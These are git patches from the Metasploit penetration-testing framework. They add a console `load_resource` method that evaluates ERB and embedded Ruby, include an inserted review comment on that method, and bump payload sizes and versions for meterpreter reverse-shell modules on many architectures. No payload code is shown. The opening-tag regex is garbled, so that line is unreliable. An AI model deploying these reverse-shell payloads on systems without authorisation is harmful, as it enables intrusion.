@@ -368,6 +369,73 @@ module DispatcherShell return items end + # Processes a resource script file for the console. + # + # @param path [String] Path to a resource file to run + # @return [void] + def load_resource(path) + if path == '-' + resource_file = $stdin.read + path = 'stdin' + elsif ::File.exist?(path) + resource_file = ::File.read(path) + else + print_error("Cannot find resource script: #{path}") + return + end + + # Process ERB directives first + print_status "Processing #{path} for ERB directives." + erb = ERB.new(resource_file) + processed_resource = erb.result(binding) + + lines = processed_resource.each_line.to_a + bindings = {} + while lines.length > 0 + + line = lines.shift + break if not line + line.strip! + next if line.length == 0 + next if line =~ /^#/ + + # Pretty soon, this is going to need an XML parser :) + # TODO: case matters for the tag and for binding names + if line =~ /|\s+)/ + bin = ($~[1] || $~[2]) + bindings[bin] = binding unless bindings.has_key? bin + bin = bindings[bin] + else + bin = binding + end + buff = '' + while lines.length > 0 + line = lines.shift + break if not line + break if line =~ /<\/ruby>/ + buff << line + end + if ! buff.empty? + session = client + framework = client.framework + + print_status("resource (#{path})> Ruby Code (#{buff.length} bytes)") + begin + eval(buff, bin) + rescue ::Interrupt + raise $! + rescue ::Exception => e + print_error("resource (#{path})> Ruby Error: #{e.class} #{e} #{e.backtrace}") + end + end + else + print_line("resource (#{path})> #{line}") + run_single(line) + end + end + end + # # Run a single command line. # From ebaf0c5484551b4cbd37f133ca7f44beceaa4e8b Mon Sep 17 00:00:00 2001 From: Brent Cook Date: Mon, 30 Oct 2017 05:09:31 -0500 Subject: [PATCH 068/254] bump mettle, update toolchain, add e500v2 and reduce size of x86_64 --- Gemfile.lock | 4 ++-- metasploit-framework.gemspec | 2 +- 2 files changed, 3 insertions(+), 3 deletions(-) 
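Review bot: An unterminated `<ruby>` block is not detected in `load_resource`: the inner `while` that collects `buff` stops only on `</ruby>` or when `lines` is exhausted, so a missing or misspelled closing tag feeds every remaining console command to `eval` and the failure surfaces as an opaque `Ruby Error` instead of a message naming the real problem; track whether the closing tag was seen and report it, as in the excerpt below. `erb.result(binding)` has no rescue, so an ERB syntax error escapes `load_resource` as a raw exception before any `resource (path)>` line is printed, unlike the `<ruby>` path; wrapping it in the same `rescue StandardError => e` / `print_error` pattern would keep the two failure modes consistent. The opening-tag test on the `if line =~ ...` line is garbled in this rendering (the tag text is missing), so that regex could not be reviewed. `session = client` assumes the including class provides `client`; nothing in the hunk defines it, so the doc comment should say so, e.g. `# @note Expects the including dispatcher to define #client; the resource text is executed as Ruby (ERB and <ruby> blocks) in the console process`.
```ruby
        buff = ''
        closed = false
        while lines.length > 0
          line = lines.shift
          break if not line
          if line =~ /<\/ruby>/
            closed = true
            break
          end
          buff << line
        end
        unless closed
          print_error("resource (#{path})> unterminated <ruby> block, skipping #{buff.length} bytes")
          next
        end
        # … unchanged: session/framework locals, eval of buff with the selected binding …
```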
diff --git a/Gemfile.lock b/Gemfile.lock index d1f3a823bf..e32cd33f32 100644 --- a/Gemfile.lock +++ b/Gemfile.lock @@ -19,7 +19,7 @@ PATH metasploit-model metasploit-payloads (= 1.3.13) metasploit_data_models - metasploit_payloads-mettle (= 0.2.2) + metasploit_payloads-mettle (= 0.2.5) msgpack nessus_rest net-ssh @@ -189,7 +189,7 @@ GEM postgres_ext railties (~> 4.2.6) recog (~> 2.0) - metasploit_payloads-mettle (0.2.2) + metasploit_payloads-mettle (0.2.5) method_source (0.9.0) mini_portile2 (2.3.0) minitest (5.10.3) diff --git a/metasploit-framework.gemspec b/metasploit-framework.gemspec index 46f5fcb14e..bb1923e736 100644 --- a/metasploit-framework.gemspec +++ b/metasploit-framework.gemspec @@ -72,7 +72,7 @@ Gem::Specification.new do |spec| # Needed for Meterpreter spec.add_runtime_dependency 'metasploit-payloads', '1.3.13' # Needed for the next-generation POSIX Meterpreter - spec.add_runtime_dependency 'metasploit_payloads-mettle', '0.2.2' + spec.add_runtime_dependency 'metasploit_payloads-mettle', '0.2.5' # Needed by msfgui and other rpc components spec.add_runtime_dependency 'msgpack' # get list of network interfaces, like eth* from OS. From 22f9626186508322a48681fcf7574ebbf74c7384 Mon Sep 17 00:00:00 2001 
From: Brent Cook Date: Mon, 30 Oct 2017 05:26:29 -0500 Subject: [PATCH 069/254] update sizes --- .../payloads/singles/linux/aarch64/meterpreter_reverse_http.rb | 2 +- .../payloads/singles/linux/aarch64/meterpreter_reverse_https.rb | 2 +- .../payloads/singles/linux/aarch64/meterpreter_reverse_tcp.rb | 2 +- .../payloads/singles/linux/armbe/meterpreter_reverse_http.rb | 2 +- .../payloads/singles/linux/armbe/meterpreter_reverse_https.rb | 2 +- modules/payloads/singles/linux/armbe/meterpreter_reverse_tcp.rb | 2 +- .../payloads/singles/linux/armle/meterpreter_reverse_http.rb | 2 +- .../payloads/singles/linux/armle/meterpreter_reverse_https.rb | 2 +- modules/payloads/singles/linux/armle/meterpreter_reverse_tcp.rb | 2 +- .../payloads/singles/linux/mips64/meterpreter_reverse_http.rb | 2 +- .../payloads/singles/linux/mips64/meterpreter_reverse_https.rb | 2 +- .../payloads/singles/linux/mips64/meterpreter_reverse_tcp.rb | 2 +- .../payloads/singles/linux/mipsbe/meterpreter_reverse_http.rb | 2 +- .../payloads/singles/linux/mipsbe/meterpreter_reverse_https.rb | 2 +- .../payloads/singles/linux/mipsbe/meterpreter_reverse_tcp.rb | 2 +- .../payloads/singles/linux/mipsle/meterpreter_reverse_http.rb | 2 +- .../payloads/singles/linux/mipsle/meterpreter_reverse_https.rb | 2 +- .../payloads/singles/linux/mipsle/meterpreter_reverse_tcp.rb | 2 +- modules/payloads/singles/linux/ppc/meterpreter_reverse_http.rb | 2 +- modules/payloads/singles/linux/ppc/meterpreter_reverse_https.rb | 2 +- modules/payloads/singles/linux/ppc/meterpreter_reverse_tcp.rb | 2 +- .../payloads/singles/linux/ppc64le/meterpreter_reverse_http.rb | 2 +- .../payloads/singles/linux/ppc64le/meterpreter_reverse_https.rb | 2 +- .../payloads/singles/linux/ppc64le/meterpreter_reverse_tcp.rb | 2 +- modules/payloads/singles/linux/x64/meterpreter_reverse_http.rb | 2 +- modules/payloads/singles/linux/x64/meterpreter_reverse_https.rb | 2 +- modules/payloads/singles/linux/x64/meterpreter_reverse_tcp.rb | 2 +- 
modules/payloads/singles/linux/x86/meterpreter_reverse_http.rb | 2 +- modules/payloads/singles/linux/x86/meterpreter_reverse_https.rb | 2 +- modules/payloads/singles/linux/x86/meterpreter_reverse_tcp.rb | 2 +- .../payloads/singles/linux/zarch/meterpreter_reverse_http.rb | 2 +- .../payloads/singles/linux/zarch/meterpreter_reverse_https.rb | 2 +- modules/payloads/singles/linux/zarch/meterpreter_reverse_tcp.rb | 2 +- modules/payloads/singles/osx/x64/meterpreter_reverse_http.rb | 2 +- modules/payloads/singles/osx/x64/meterpreter_reverse_https.rb | 2 +- modules/payloads/singles/osx/x64/meterpreter_reverse_tcp.rb | 2 +- 36 files changed, 36 insertions(+), 36 deletions(-) diff --git a/modules/payloads/singles/linux/aarch64/meterpreter_reverse_http.rb b/modules/payloads/singles/linux/aarch64/meterpreter_reverse_http.rb index 25b4b456e2..88c27331ff 100644 --- a/modules/payloads/singles/linux/aarch64/meterpreter_reverse_http.rb +++ b/modules/payloads/singles/linux/aarch64/meterpreter_reverse_http.rb @@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_aarch64_linux' module MetasploitModule - CachedSize = 675112 + CachedSize = 692384 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/linux/aarch64/meterpreter_reverse_https.rb b/modules/payloads/singles/linux/aarch64/meterpreter_reverse_https.rb index 7f493ef8e9..70b5b22c3a 100644 --- a/modules/payloads/singles/linux/aarch64/meterpreter_reverse_https.rb +++ b/modules/payloads/singles/linux/aarch64/meterpreter_reverse_https.rb @@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_aarch64_linux' module MetasploitModule - CachedSize = 675112 + CachedSize = 692384 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/linux/aarch64/meterpreter_reverse_tcp.rb b/modules/payloads/singles/linux/aarch64/meterpreter_reverse_tcp.rb index 4c1b96f0db..3c23cfc864 100644 
--- a/modules/payloads/singles/linux/aarch64/meterpreter_reverse_tcp.rb +++ b/modules/payloads/singles/linux/aarch64/meterpreter_reverse_tcp.rb @@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_aarch64_linux' module MetasploitModule - CachedSize = 675112 + CachedSize = 692384 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/linux/armbe/meterpreter_reverse_http.rb b/modules/payloads/singles/linux/armbe/meterpreter_reverse_http.rb index 4fff3cf0a5..f4858b8243 100644 --- a/modules/payloads/singles/linux/armbe/meterpreter_reverse_http.rb +++ b/modules/payloads/singles/linux/armbe/meterpreter_reverse_http.rb @@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_armbe_linux' module MetasploitModule - CachedSize = 668392 + CachedSize = 678568 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/linux/armbe/meterpreter_reverse_https.rb b/modules/payloads/singles/linux/armbe/meterpreter_reverse_https.rb index d1e889a621..894c078891 100644 --- a/modules/payloads/singles/linux/armbe/meterpreter_reverse_https.rb +++ b/modules/payloads/singles/linux/armbe/meterpreter_reverse_https.rb @@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_armbe_linux' module MetasploitModule - CachedSize = 668392 + CachedSize = 678568 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/linux/armbe/meterpreter_reverse_tcp.rb b/modules/payloads/singles/linux/armbe/meterpreter_reverse_tcp.rb index 7ac0601213..1616b986ec 100644 --- a/modules/payloads/singles/linux/armbe/meterpreter_reverse_tcp.rb +++ b/modules/payloads/singles/linux/armbe/meterpreter_reverse_tcp.rb @@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_armbe_linux' module MetasploitModule - CachedSize = 668392 + CachedSize = 678568 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions 
diff --git a/modules/payloads/singles/linux/armle/meterpreter_reverse_http.rb b/modules/payloads/singles/linux/armle/meterpreter_reverse_http.rb index 5da3516adf..62d9f16d0e 100644 --- a/modules/payloads/singles/linux/armle/meterpreter_reverse_http.rb +++ b/modules/payloads/singles/linux/armle/meterpreter_reverse_http.rb @@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_armle_linux' module MetasploitModule - CachedSize = 666984 + CachedSize = 677296 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/linux/armle/meterpreter_reverse_https.rb b/modules/payloads/singles/linux/armle/meterpreter_reverse_https.rb index 976d22b3d0..3149bcca28 100644 --- a/modules/payloads/singles/linux/armle/meterpreter_reverse_https.rb +++ b/modules/payloads/singles/linux/armle/meterpreter_reverse_https.rb @@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_armle_linux' module MetasploitModule - CachedSize = 666984 + CachedSize = 677296 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/linux/armle/meterpreter_reverse_tcp.rb b/modules/payloads/singles/linux/armle/meterpreter_reverse_tcp.rb index 866d3a0e5c..1243e402de 100644 --- a/modules/payloads/singles/linux/armle/meterpreter_reverse_tcp.rb +++ b/modules/payloads/singles/linux/armle/meterpreter_reverse_tcp.rb @@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_armle_linux' module MetasploitModule - CachedSize = 666984 + CachedSize = 677296 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/linux/mips64/meterpreter_reverse_http.rb b/modules/payloads/singles/linux/mips64/meterpreter_reverse_http.rb index 8e5a81046a..dd9368b245 100644 --- a/modules/payloads/singles/linux/mips64/meterpreter_reverse_http.rb +++ b/modules/payloads/singles/linux/mips64/meterpreter_reverse_http.rb 
@@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_mips64_linux' module MetasploitModule - CachedSize = 1059368 + CachedSize = 1077640 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/linux/mips64/meterpreter_reverse_https.rb b/modules/payloads/singles/linux/mips64/meterpreter_reverse_https.rb index 01618c62b5..8c34b01940 100644 --- a/modules/payloads/singles/linux/mips64/meterpreter_reverse_https.rb +++ b/modules/payloads/singles/linux/mips64/meterpreter_reverse_https.rb @@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_mips64_linux' module MetasploitModule - CachedSize = 1059368 + CachedSize = 1077640 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/linux/mips64/meterpreter_reverse_tcp.rb b/modules/payloads/singles/linux/mips64/meterpreter_reverse_tcp.rb index 65778b0f92..8e0de4303b 100644 --- a/modules/payloads/singles/linux/mips64/meterpreter_reverse_tcp.rb +++ b/modules/payloads/singles/linux/mips64/meterpreter_reverse_tcp.rb @@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_mips64_linux' module MetasploitModule - CachedSize = 1059368 + CachedSize = 1077640 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/linux/mipsbe/meterpreter_reverse_http.rb b/modules/payloads/singles/linux/mipsbe/meterpreter_reverse_http.rb index ee78530672..fdc9ad4109 100644 --- a/modules/payloads/singles/linux/mipsbe/meterpreter_reverse_http.rb +++ b/modules/payloads/singles/linux/mipsbe/meterpreter_reverse_http.rb @@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_mipsbe_linux' module MetasploitModule - CachedSize = 1037512 + CachedSize = 1053924 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions 
diff --git a/modules/payloads/singles/linux/mipsbe/meterpreter_reverse_https.rb b/modules/payloads/singles/linux/mipsbe/meterpreter_reverse_https.rb index 05b53aa7ba..a5db786462 100644 --- a/modules/payloads/singles/linux/mipsbe/meterpreter_reverse_https.rb +++ b/modules/payloads/singles/linux/mipsbe/meterpreter_reverse_https.rb @@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_mipsbe_linux' module MetasploitModule - CachedSize = 1037512 + CachedSize = 1053924 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/linux/mipsbe/meterpreter_reverse_tcp.rb b/modules/payloads/singles/linux/mipsbe/meterpreter_reverse_tcp.rb index bc38d4a374..da8aba961f 100644 --- a/modules/payloads/singles/linux/mipsbe/meterpreter_reverse_tcp.rb +++ b/modules/payloads/singles/linux/mipsbe/meterpreter_reverse_tcp.rb @@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_mipsbe_linux' module MetasploitModule - CachedSize = 1037512 + CachedSize = 1053924 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/linux/mipsle/meterpreter_reverse_http.rb b/modules/payloads/singles/linux/mipsle/meterpreter_reverse_http.rb index 92ad4f9c77..21021201df 100644 --- a/modules/payloads/singles/linux/mipsle/meterpreter_reverse_http.rb +++ b/modules/payloads/singles/linux/mipsle/meterpreter_reverse_http.rb @@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_mipsle_linux' module MetasploitModule - CachedSize = 1036808 + CachedSize = 1053540 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/linux/mipsle/meterpreter_reverse_https.rb b/modules/payloads/singles/linux/mipsle/meterpreter_reverse_https.rb index 27e5989778..4bd4e3818e 100644 --- a/modules/payloads/singles/linux/mipsle/meterpreter_reverse_https.rb +++ b/modules/payloads/singles/linux/mipsle/meterpreter_reverse_https.rb 
@@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_mipsle_linux' module MetasploitModule - CachedSize = 1036808 + CachedSize = 1053540 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/linux/mipsle/meterpreter_reverse_tcp.rb b/modules/payloads/singles/linux/mipsle/meterpreter_reverse_tcp.rb index 66cdd82b24..3735553d80 100644 --- a/modules/payloads/singles/linux/mipsle/meterpreter_reverse_tcp.rb +++ b/modules/payloads/singles/linux/mipsle/meterpreter_reverse_tcp.rb @@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_mipsle_linux' module MetasploitModule - CachedSize = 1036808 + CachedSize = 1053540 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/linux/ppc/meterpreter_reverse_http.rb b/modules/payloads/singles/linux/ppc/meterpreter_reverse_http.rb index 7c3d17f612..c18783c2b3 100644 --- a/modules/payloads/singles/linux/ppc/meterpreter_reverse_http.rb +++ b/modules/payloads/singles/linux/ppc/meterpreter_reverse_http.rb @@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_ppc_linux' module MetasploitModule - CachedSize = 789196 + CachedSize = 854692 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/linux/ppc/meterpreter_reverse_https.rb b/modules/payloads/singles/linux/ppc/meterpreter_reverse_https.rb index 2edd9d4421..651bc9c1b6 100644 --- a/modules/payloads/singles/linux/ppc/meterpreter_reverse_https.rb +++ b/modules/payloads/singles/linux/ppc/meterpreter_reverse_https.rb @@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_ppc_linux' module MetasploitModule - CachedSize = 789196 + CachedSize = 854692 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/linux/ppc/meterpreter_reverse_tcp.rb b/modules/payloads/singles/linux/ppc/meterpreter_reverse_tcp.rb index fe8cbdd08a..d2771d7a0c 100644 
--- a/modules/payloads/singles/linux/ppc/meterpreter_reverse_tcp.rb +++ b/modules/payloads/singles/linux/ppc/meterpreter_reverse_tcp.rb @@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_ppc_linux' module MetasploitModule - CachedSize = 789196 + CachedSize = 854692 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/linux/ppc64le/meterpreter_reverse_http.rb b/modules/payloads/singles/linux/ppc64le/meterpreter_reverse_http.rb index 94dbd28258..8baaf5149a 100644 --- a/modules/payloads/singles/linux/ppc64le/meterpreter_reverse_http.rb +++ b/modules/payloads/singles/linux/ppc64le/meterpreter_reverse_http.rb @@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_ppc64le_linux' module MetasploitModule - CachedSize = 855928 + CachedSize = 856312 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/linux/ppc64le/meterpreter_reverse_https.rb b/modules/payloads/singles/linux/ppc64le/meterpreter_reverse_https.rb index 353b7ccf37..8bfe23028d 100644 --- a/modules/payloads/singles/linux/ppc64le/meterpreter_reverse_https.rb +++ b/modules/payloads/singles/linux/ppc64le/meterpreter_reverse_https.rb @@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_ppc64le_linux' module MetasploitModule - CachedSize = 855928 + CachedSize = 856312 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/linux/ppc64le/meterpreter_reverse_tcp.rb b/modules/payloads/singles/linux/ppc64le/meterpreter_reverse_tcp.rb index 48c3abe40b..7f6980e6f7 100644 --- a/modules/payloads/singles/linux/ppc64le/meterpreter_reverse_tcp.rb +++ b/modules/payloads/singles/linux/ppc64le/meterpreter_reverse_tcp.rb @@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_ppc64le_linux' module MetasploitModule - CachedSize = 855928 + CachedSize = 856312 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions 
diff --git a/modules/payloads/singles/linux/x64/meterpreter_reverse_http.rb b/modules/payloads/singles/linux/x64/meterpreter_reverse_http.rb index c8ec4d34ba..2c41b001e2 100644 --- a/modules/payloads/singles/linux/x64/meterpreter_reverse_http.rb +++ b/modules/payloads/singles/linux/x64/meterpreter_reverse_http.rb @@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_x64_linux' module MetasploitModule - CachedSize = 729184 + CachedSize = 745472 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/linux/x64/meterpreter_reverse_https.rb b/modules/payloads/singles/linux/x64/meterpreter_reverse_https.rb index 3e9f8ab1d6..a89325ffbb 100644 --- a/modules/payloads/singles/linux/x64/meterpreter_reverse_https.rb +++ b/modules/payloads/singles/linux/x64/meterpreter_reverse_https.rb @@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_x64_linux' module MetasploitModule - CachedSize = 729184 + CachedSize = 745472 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/linux/x64/meterpreter_reverse_tcp.rb b/modules/payloads/singles/linux/x64/meterpreter_reverse_tcp.rb index e52a985f0c..b5ace9bfeb 100644 --- a/modules/payloads/singles/linux/x64/meterpreter_reverse_tcp.rb +++ b/modules/payloads/singles/linux/x64/meterpreter_reverse_tcp.rb @@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_x64_linux' module MetasploitModule - CachedSize = 729184 + CachedSize = 745472 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/linux/x86/meterpreter_reverse_http.rb b/modules/payloads/singles/linux/x86/meterpreter_reverse_http.rb index 3d44d1abe8..078ea923e9 100644 --- a/modules/payloads/singles/linux/x86/meterpreter_reverse_http.rb +++ b/modules/payloads/singles/linux/x86/meterpreter_reverse_http.rb 
@@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_x86_linux' module MetasploitModule - CachedSize = 772828 + CachedSize = 793296 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/linux/x86/meterpreter_reverse_https.rb b/modules/payloads/singles/linux/x86/meterpreter_reverse_https.rb index 8d2f70e310..a3f8085c2a 100644 --- a/modules/payloads/singles/linux/x86/meterpreter_reverse_https.rb +++ b/modules/payloads/singles/linux/x86/meterpreter_reverse_https.rb @@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_x86_linux' module MetasploitModule - CachedSize = 772828 + CachedSize = 793296 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/linux/x86/meterpreter_reverse_tcp.rb b/modules/payloads/singles/linux/x86/meterpreter_reverse_tcp.rb index 55bdf50aa5..3660fc5810 100644 --- a/modules/payloads/singles/linux/x86/meterpreter_reverse_tcp.rb +++ b/modules/payloads/singles/linux/x86/meterpreter_reverse_tcp.rb @@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_x86_linux' module MetasploitModule - CachedSize = 772828 + CachedSize = 793296 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/linux/zarch/meterpreter_reverse_http.rb b/modules/payloads/singles/linux/zarch/meterpreter_reverse_http.rb index d5adac9574..e522b7c89c 100644 --- a/modules/payloads/singles/linux/zarch/meterpreter_reverse_http.rb +++ b/modules/payloads/singles/linux/zarch/meterpreter_reverse_http.rb @@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_zarch_linux' module MetasploitModule - CachedSize = 893560 + CachedSize = 905864 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/linux/zarch/meterpreter_reverse_https.rb b/modules/payloads/singles/linux/zarch/meterpreter_reverse_https.rb index 0e8fe66ace..ae31cc5abe 100644 
--- a/modules/payloads/singles/linux/zarch/meterpreter_reverse_https.rb +++ b/modules/payloads/singles/linux/zarch/meterpreter_reverse_https.rb @@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_zarch_linux' module MetasploitModule - CachedSize = 893560 + CachedSize = 905864 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/linux/zarch/meterpreter_reverse_tcp.rb b/modules/payloads/singles/linux/zarch/meterpreter_reverse_tcp.rb index abb089db49..5e73f26542 100644 --- a/modules/payloads/singles/linux/zarch/meterpreter_reverse_tcp.rb +++ b/modules/payloads/singles/linux/zarch/meterpreter_reverse_tcp.rb @@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_zarch_linux' module MetasploitModule - CachedSize = 893560 + CachedSize = 905864 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/osx/x64/meterpreter_reverse_http.rb b/modules/payloads/singles/osx/x64/meterpreter_reverse_http.rb index 4a08503586..cf4c1f6b81 100644 --- a/modules/payloads/singles/osx/x64/meterpreter_reverse_http.rb +++ b/modules/payloads/singles/osx/x64/meterpreter_reverse_http.rb @@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_x64_osx' module MetasploitModule - CachedSize = 618412 + CachedSize = 789068 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/osx/x64/meterpreter_reverse_https.rb b/modules/payloads/singles/osx/x64/meterpreter_reverse_https.rb index 6436a8b549..c4f9172030 100644 --- a/modules/payloads/singles/osx/x64/meterpreter_reverse_https.rb +++ b/modules/payloads/singles/osx/x64/meterpreter_reverse_https.rb @@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_x64_osx' module MetasploitModule - CachedSize = 618412 + CachedSize = 789068 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions 
diff --git a/modules/payloads/singles/osx/x64/meterpreter_reverse_tcp.rb b/modules/payloads/singles/osx/x64/meterpreter_reverse_tcp.rb index a70eb46ee7..82da65b261 100644 --- a/modules/payloads/singles/osx/x64/meterpreter_reverse_tcp.rb +++ b/modules/payloads/singles/osx/x64/meterpreter_reverse_tcp.rb @@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_x64_osx' module MetasploitModule - CachedSize = 618412 + CachedSize = 789068 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions From 56eb828cc5d57f0f36bbb43e9b405fb9acefe2f0 Mon Sep 17 00:00:00 2001 
From: Brent Cook Date: Mon, 30 Oct 2017 14:04:10 -0500 Subject: [PATCH 070/254] add e500v2 payloads --- Gemfile.lock | 2 +- .../sessions/meterpreter_ppce500v2_linux.rb | 29 ++++++++++++ lib/msf/core/payload/uuid.rb | 3 +- .../linux/aarch64/meterpreter_reverse_http.rb | 3 +- .../aarch64/meterpreter_reverse_https.rb | 3 +- .../linux/aarch64/meterpreter_reverse_tcp.rb | 3 +- .../linux/armbe/meterpreter_reverse_http.rb | 3 +- .../linux/armbe/meterpreter_reverse_https.rb | 3 +- .../linux/armbe/meterpreter_reverse_tcp.rb | 3 +- .../linux/armle/meterpreter_reverse_http.rb | 3 +- .../linux/armle/meterpreter_reverse_https.rb | 3 +- .../linux/armle/meterpreter_reverse_tcp.rb | 3 +- .../linux/mips64/meterpreter_reverse_http.rb | 3 +- .../linux/mips64/meterpreter_reverse_https.rb | 3 +- .../linux/mips64/meterpreter_reverse_tcp.rb | 3 +- .../linux/mipsbe/meterpreter_reverse_http.rb | 3 +- .../linux/mipsbe/meterpreter_reverse_https.rb | 3 +- .../linux/mipsbe/meterpreter_reverse_tcp.rb | 3 +- .../linux/mipsle/meterpreter_reverse_http.rb | 3 +- .../linux/mipsle/meterpreter_reverse_https.rb | 3 +- .../linux/mipsle/meterpreter_reverse_tcp.rb | 3 +- .../linux/ppc/meterpreter_reverse_http.rb | 3 +- .../linux/ppc/meterpreter_reverse_https.rb | 3 +- .../linux/ppc/meterpreter_reverse_tcp.rb | 3 +- .../linux/ppc64le/meterpreter_reverse_http.rb | 3 +- .../ppc64le/meterpreter_reverse_https.rb | 3 +- .../linux/ppc64le/meterpreter_reverse_tcp.rb | 3 +- .../ppce500v2/meterpreter_reverse_http.rb | 44 +++++++++++++++++++ .../ppce500v2/meterpreter_reverse_https.rb | 44 +++++++++++++++++++ .../ppce500v2/meterpreter_reverse_tcp.rb | 44 +++++++++++++++++++ .../linux/x64/meterpreter_reverse_http.rb | 3 +- .../linux/x64/meterpreter_reverse_https.rb | 3 +- .../linux/x64/meterpreter_reverse_tcp.rb | 3 +- .../linux/x86/meterpreter_reverse_http.rb | 3 +- .../linux/x86/meterpreter_reverse_https.rb | 3 +- .../linux/x86/meterpreter_reverse_tcp.rb | 3 +- .../linux/zarch/meterpreter_reverse_http.rb | 3 +- 
.../linux/zarch/meterpreter_reverse_https.rb | 3 +- .../linux/zarch/meterpreter_reverse_tcp.rb | 3 +- .../osx/x64/meterpreter_reverse_http.rb | 3 +- .../osx/x64/meterpreter_reverse_https.rb | 3 +- .../osx/x64/meterpreter_reverse_tcp.rb | 3 +- tools/modules/generate_mettle_payloads.rb | 25 ++++++----- 43 files changed, 249 insertions(+), 50 deletions(-) create mode 100644 lib/msf/base/sessions/meterpreter_ppce500v2_linux.rb create mode 100644 modules/payloads/singles/linux/ppce500v2/meterpreter_reverse_http.rb create mode 100644 modules/payloads/singles/linux/ppce500v2/meterpreter_reverse_https.rb create mode 100644 modules/payloads/singles/linux/ppce500v2/meterpreter_reverse_tcp.rb diff --git a/Gemfile.lock b/Gemfile.lock index e32cd33f32..5a57421014 100644 --- a/Gemfile.lock +++ b/Gemfile.lock @@ -252,7 +252,7 @@ GEM recog (2.1.16) nokogiri redcarpet (3.4.0) - rex-arch (0.1.11) + rex-arch (0.1.13) rex-text rex-bin_tools (0.1.4) metasm diff --git a/lib/msf/base/sessions/meterpreter_ppce500v2_linux.rb b/lib/msf/base/sessions/meterpreter_ppce500v2_linux.rb new file mode 100644 index 0000000000..85f1b69b3b --- /dev/null +++ b/lib/msf/base/sessions/meterpreter_ppce500v2_linux.rb @@ -0,0 +1,29 @@ +# -*- coding: binary -*- + +require 